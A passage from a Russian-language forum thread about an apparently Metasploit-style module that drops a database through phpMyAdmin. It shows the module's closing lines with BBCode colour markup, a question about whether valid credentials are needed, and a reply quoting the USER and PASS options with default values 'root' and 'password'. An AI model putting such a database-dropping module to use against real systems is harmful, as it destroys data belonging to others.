[/COLOR][COLOR="#0000BB"]print_status[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Database was not dropped: "[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]datastore[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]end
end
end[/COLOR][/COLOR]
Что бы его использовать надо знать верный пароль и логин от phpmyadmin? |
|
|
|
01.08.2012, 09:14
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
WendM
Строки
Код:
OptString.new('USER', [ true, "Username", 'root']),
OptString.new('PASS', [ false, "Password", 'password'])
как бы намекают на это...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
